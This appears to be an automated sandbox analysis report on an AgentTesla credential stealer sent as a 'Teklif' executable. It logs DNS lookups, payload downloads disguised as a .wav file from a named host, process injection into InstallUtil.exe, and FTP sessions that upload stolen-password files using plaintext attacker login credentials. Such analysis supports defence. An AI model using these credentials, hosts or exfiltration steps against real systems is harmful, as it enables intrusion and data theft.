                                                        Sep 27, 2024 10:43:56.139508009 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139575958 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139739037 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.139802933 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.139991999 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140058041 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140223980 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140319109 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140448093 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140508890 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140671015 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140738964 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.140867949 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.140933990 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141021967 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141077042 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141294956 CEST4435207767.212.175.162192.168.2.5
                                                        Sep 27, 2024 10:43:56.141347885 CEST52077443192.168.2.567.212.175.162
                                                        Sep 27, 2024 10:43:56.141467094 CEST4435207767.212.175.162192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 10:43:21.941817999 CEST | 50542 | 53 | 192.168.2.5 | 1.1.1.1
Sep 27, 2024 10:43:22.182703972 CEST | 53 | 50542 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:43:36.798351049 CEST | 60201 | 53 | 192.168.2.5 | 1.1.1.1
Sep 27, 2024 10:43:37.013014078 CEST | 53 | 60201 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:43:42.574939966 CEST | 53 | 64061 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:43:44.042215109 CEST | 53 | 60011 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:43:45.988929033 CEST | 55565 | 53 | 192.168.2.5 | 1.1.1.1
Sep 27, 2024 10:43:45.996412992 CEST | 53 | 55565 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:43:53.701389074 CEST | 64534 | 53 | 192.168.2.5 | 1.1.1.1
Sep 27, 2024 10:43:53.976898909 CEST | 53 | 64534 | 1.1.1.1 | 192.168.2.5
Sep 27, 2024 10:44:00.126416922 CEST | 52463 | 53 | 192.168.2.5 | 1.1.1.1
Sep 27, 2024 10:44:00.221124887 CEST | 53 | 52463 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 10:43:21.941817999 CEST | 192.168.2.5 | 1.1.1.1 | 0xfe12 | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:43:36.798351049 CEST | 192.168.2.5 | 1.1.1.1 | 0xeef1 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:43:45.988929033 CEST | 192.168.2.5 | 1.1.1.1 | 0x6e5a | Standard query (0) | 50.23.12.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 10:43:53.701389074 CEST | 192.168.2.5 | 1.1.1.1 | 0xd6f1 | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:44:00.126416922 CEST | 192.168.2.5 | 1.1.1.1 | 0x9662 | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 10:43:22.182703972 CEST | 1.1.1.1 | 192.168.2.5 | 0xfe12 | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:43:37.013014078 CEST | 1.1.1.1 | 192.168.2.5 | 0xeef1 | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:43:45.996412992 CEST | 1.1.1.1 | 192.168.2.5 | 0x6e5a | Name error (3) | 50.23.12.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 27, 2024 10:43:53.976898909 CEST | 1.1.1.1 | 192.168.2.5 | 0xd6f1 | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
Sep 27, 2024 10:44:00.221124887 CEST | 1.1.1.1 | 192.168.2.5 | 0x9662 | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
                                                        • wymascensores.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 67.212.175.162 | 443 | 3060 | C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:43:22 UTC | 80 | OUT | GET /img/Tcghz.wav HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
2024-09-27 08:43:22 UTC | 211 | IN | HTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:43:22 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1917952
                                                        Connection: close
                                                        Content-Type: audio/x-wav


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 52073 | 67.212.175.162 | 443 | 1120 | C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:43:46 UTC | 80 | OUT | GET /img/Tcghz.wav HTTP/1.1
                                                        Host: wymascensores.com
                                                        Connection: Keep-Alive
2024-09-27 08:43:46 UTC | 211 | IN | HTTP/1.1 200 OK
                                                        Date: Fri, 27 Sep 2024 08:43:45 GMT
                                                        Server: Apache
                                                        Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1917952
                                                        Connection: close
                                                        Content-Type: audio/x-wav


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 52077 | 67.212.175.162 | 443 | 2928 | C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-27 08:43:54 UTC | 80 | OUT | GET /img/Tcghz.wav HTTP/1.1
    Host: wymascensores.com
    Connection: Keep-Alive
2024-09-27 08:43:54 UTC | 211 | IN | HTTP/1.1 200 OK
    Date: Fri, 27 Sep 2024 08:43:54 GMT
    Server: Apache
    Last-Modified: Thu, 26 Sep 2024 07:21:12 GMT
    Accept-Ranges: bytes
    Content-Length: 1917952
    Connection: close
    Content-Type: audio/x-wav


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 27, 2024 10:43:37.644287109 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 2 of 100 allowed.
    220-Local time is now 11:43. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Sep 27, 2024 10:43:37.644542933 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Sep 27, 2024 10:43:37.869940042 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 331 User fgghv@alternatifplastik.com OK. Password required
Sep 27, 2024 10:43:37.870100975 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | PASS Fineboy777@
Sep 27, 2024 10:43:38.161242962 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 230 OK. Current restricted directory is /
Sep 27, 2024 10:43:38.386324883 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 504 Unknown command
Sep 27, 2024 10:43:38.386569977 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | PWD
Sep 27, 2024 10:43:38.611373901 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 257 "/" is your current location
Sep 27, 2024 10:43:38.632256031 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | TYPE I
Sep 27, 2024 10:43:38.857228041 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Sep 27, 2024 10:43:38.860129118 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | PASV
Sep 27, 2024 10:43:39.085021973 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 227 Entering Passive Mode (5,2,84,236,218,179)
Sep 27, 2024 10:43:39.090953112 CEST | 49705 | 21 | 192.168.2.5 | 5.2.84.236 | STOR PW_user-701188_2024_09_27_04_43_36.html
Sep 27, 2024 10:43:39.726114988 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 150 Accepted data connection
Sep 27, 2024 10:43:39.952034950 CEST | 21 | 49705 | 5.2.84.236 | 192.168.2.5 | 226-File successfully transferred
    226 0.227 seconds (measured here), 1.38 Kbytes per second
Sep 27, 2024 10:44:00.846366882 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 3 of 100 allowed.
    220-Local time is now 11:43. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Sep 27, 2024 10:44:00.877207041 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Sep 27, 2024 10:44:01.104191065 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 331 User fgghv@alternatifplastik.com OK. Password required
Sep 27, 2024 10:44:01.104353905 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | PASS Fineboy777@
Sep 27, 2024 10:44:01.356802940 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 230 OK. Current restricted directory is /
Sep 27, 2024 10:44:01.584502935 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 504 Unknown command
Sep 27, 2024 10:44:01.584752083 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | PWD
Sep 27, 2024 10:44:01.805085897 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 257 "/" is your current location
Sep 27, 2024 10:44:01.805367947 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | TYPE I
Sep 27, 2024 10:44:02.025809050 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 200 TYPE is now 8-bit binary
Sep 27, 2024 10:44:02.026000023 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | PASV
Sep 27, 2024 10:44:02.246365070 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 227 Entering Passive Mode (5,2,84,236,237,183)
Sep 27, 2024 10:44:02.252408028 CEST | 52078 | 21 | 192.168.2.5 | 5.2.84.236 | STOR PW_user-701188_2024_09_27_04_43_59.html
Sep 27, 2024 10:44:02.871179104 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 150 Accepted data connection
Sep 27, 2024 10:44:03.096740961 CEST | 21 | 52078 | 5.2.84.236 | 192.168.2.5 | 226-File successfully transferred
    226 0.229 seconds (measured here), 1.36 Kbytes per second
Sep 27, 2024 10:44:09.020767927 CEST | 21 | 52080 | 5.2.84.236 | 192.168.2.5 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
    220-You are user number 3 of 100 allowed.
    220-Local time is now 11:44. Server port: 21.
    220-This is a private system - No anonymous login
    220-IPv6 connections are also welcome on this server.
    220 You will be disconnected after 10 minutes of inactivity.
Sep 27, 2024 10:44:09.021080017 CEST | 52080 | 21 | 192.168.2.5 | 5.2.84.236 | USER fgghv@alternatifplastik.com
Sep 27, 2024 10:44:09.245609045 CEST | 21 | 52080 | 5.2.84.236 | 192.168.2.5 | 331 User fgghv@alternatifplastik.com OK. Password required
Sep 27, 2024 10:44:09.245783091 CEST | 52080 | 21 | 192.168.2.5 | 5.2.84.236 | PASS Fineboy777@
Sep 27, 2024 10:44:09.495488882 CEST | 21 | 52080 | 5.2.84.236 | 192.168.2.5 | 230 OK. Current restricted directory is /
Sep 27, 2024 10:44:09.720036030 CEST | 21 | 52080 | 5.2.84.236 | 192.168.2.5 | 504 Unknown command
Sep 27, 2024 10:44:09.720227003 CEST | 52080 | 21 | 192.168.2.5 | 5.2.84.236 | PWD
Sep 27, 2024 10:44:09.944448948 CEST | 21 | 52080 | 5.2.84.236 | 192.168.2.5 | 257 "/" is your current location
Sep 27, 2024 10:44:09.944714069 CEST | 52080 | 21 | 192.168.2.5 | 5.2.84.236 | TYPE I
                                                        Sep 27, 2024 10:44:10.169923067 CEST21520805.2.84.236192.168.2.5200 TYPE is now 8-bit binary
                                                        Sep 27, 2024 10:44:10.170335054 CEST5208021192.168.2.55.2.84.236PASV
                                                        Sep 27, 2024 10:44:10.394684076 CEST21520805.2.84.236192.168.2.5227 Entering Passive Mode (5,2,84,236,203,141)
                                                        Sep 27, 2024 10:44:10.402749062 CEST5208021192.168.2.55.2.84.236STOR PW_user-701188_2024_09_27_04_44_07.html
                                                        Sep 27, 2024 10:44:11.022186995 CEST21520805.2.84.236192.168.2.5150 Accepted data connection
                                                        Sep 27, 2024 10:44:11.247031927 CEST21520805.2.84.236192.168.2.5226-File successfully transferred
                                                        226-File successfully transferred226 0.225 seconds (measured here), 1.39 Kbytes per second


                                                        Target ID:0
                                                        Start time:04:43:21
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe"
                                                        Imagebase:0xd0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2206832205.0000000002538000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:04:43:34
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x290000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2444038215.0000000000362000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2448653484.000000000263E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.2448653484.00000000025F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:04:43:44
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                                                        Imagebase:0xbc0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2477328871.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2446673623.0000000003264000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2446673623.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 50%, ReversingLabs
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:5
                                                        Start time:04:43:52
                                                        Start date:27/09/2024
                                                        Path:C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                                                        Imagebase:0x4a0000
                                                        File size:30'208 bytes
                                                        MD5 hash:A016634929C4D57CC24719723A4CD65C
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2558909751.0000000003A4B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.2532866894.0000000002918000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:6
                                                        Start time:04:43:58
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x8d0000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2532815910.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2532815910.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:04:44:06
                                                        Start date:27/09/2024
                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                        Imagebase:0x820000
                                                        File size:42'064 bytes
                                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3319267989.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.3319267989.0000000002C07000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                        Reputation:moderate
                                                        Has exited:false


                                                          Execution Graph

                                                          Execution Coverage:11%
                                                          Dynamic/Decrypted Code Coverage:99.3%
                                                          Signature Coverage:3.2%
                                                          Total number of Nodes:411
                                                          Total number of Limit Nodes:14
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-3443518476
                                                          • Opcode ID: 265188e723dfcc6fdfae6a95876bf4f44aab6a839dc3708dd33cd59b83091400
                                                          • Instruction ID: 246c36c9a1c511b192f6f8deee0b654dac8af32b0bbd469f4d45b75510c5bb5b
                                                          • Opcode Fuzzy Hash: 265188e723dfcc6fdfae6a95876bf4f44aab6a839dc3708dd33cd59b83091400
                                                          • Instruction Fuzzy Hash: 8AB2F638A00218DFDB14DFA8C995BADB7B6FF48700F158599E506AB2A5DB70EC81CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                          • API String ID: 0-324474496
                                                          • Opcode ID: 13fda0c895fd9db221f67c6a50e266653be272cc028d5fb86574fdf4c1a9e3a7
                                                          • Instruction ID: 762dd4ce2e2320c5d29a0eff0a54f322a55bc5dee489e8d007e3914555661321
                                                          • Opcode Fuzzy Hash: 13fda0c895fd9db221f67c6a50e266653be272cc028d5fb86574fdf4c1a9e3a7
                                                          • Instruction Fuzzy Hash: 4422FB38A00219CFDB24DFA4C995BADB7B6FF48304F148599E509AB2A5DB70ED81CF50

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RZW+$TJbq$Te]q$paq$xb`q
                                                          • API String ID: 0-4120908068
                                                          • Opcode ID: d42f3749fecb464088d6254efdcc18affc60c680c864d8ba14d80b9d0dd8ae8d
                                                          • Instruction ID: aa30652f1e1cc71832141e5889fab953c5c36d826780fee4b4de806ca8dad755
                                                          • Opcode Fuzzy Hash: d42f3749fecb464088d6254efdcc18affc60c680c864d8ba14d80b9d0dd8ae8d
                                                          • Instruction Fuzzy Hash: CCA2B775A00228CFDB65CF69D984A99BBB2FF89304F1581E9D50DAB325DB319E81CF40

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$8$U-wA
                                                          • API String ID: 0-1777653695
                                                          • Opcode ID: b9ddf822385f9a508ba6157c9bb96275d139953a09628ea8873fb0032805bcd6
                                                          • Instruction ID: e698eb8c58e5ccbb6d040c6fb6621cc3fcab229f2a5f827d4d3b12fab57d4b5a
                                                          • Opcode Fuzzy Hash: b9ddf822385f9a508ba6157c9bb96275d139953a09628ea8873fb0032805bcd6
                                                          • Instruction Fuzzy Hash: 7C42C375D00629CBDB64DF69C850AD9B7B2BF89314F1486EAD44DA7251EB30AE81CF40

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Pl]q$$]q
                                                          • API String ID: 0-2369359564
                                                          • Opcode ID: d078e26f2d11c45386fa89875ce3e9ddbc8732afdf11dd74dfaa4a6c78945cac
                                                          • Instruction ID: f593cb29b0eb47ead41e9c9ab5aea5e5f3d6562efbb9033256fc4227f1c6c047
                                                          • Opcode Fuzzy Hash: d078e26f2d11c45386fa89875ce3e9ddbc8732afdf11dd74dfaa4a6c78945cac
                                                          • Instruction Fuzzy Hash: 03324734B40209CFCB28DF69C589A6A77FAFF89710B1684A9D406CB365DB35EC41CB61

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fbq$h
                                                          • API String ID: 0-3598783323
                                                          • Opcode ID: edcf4bcaf11388a66725ef3dec22dd5359b82e36a559fb7c4a79486f5969cfa5
                                                          • Instruction ID: 07214b438ce047618cc3584796f4033fc15ca2efede63fe2c285685598a87601
                                                          • Opcode Fuzzy Hash: edcf4bcaf11388a66725ef3dec22dd5359b82e36a559fb7c4a79486f5969cfa5
                                                          • Instruction Fuzzy Hash: EC61C371D006298BEB64DF6ACC40BD9BBB6FF89310F14C6AAD40DA7250EB305A85CF51
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231971594.0000000005980000.00000040.00000800.00020000.00000000.sdmp, Offset: 05980000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5980000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (aq
                                                          • API String ID: 0-600464949
                                                          • Opcode ID: 037297907759e2293f54243399ddd74b56959188b638ab2d94c1acb3755aa3c5
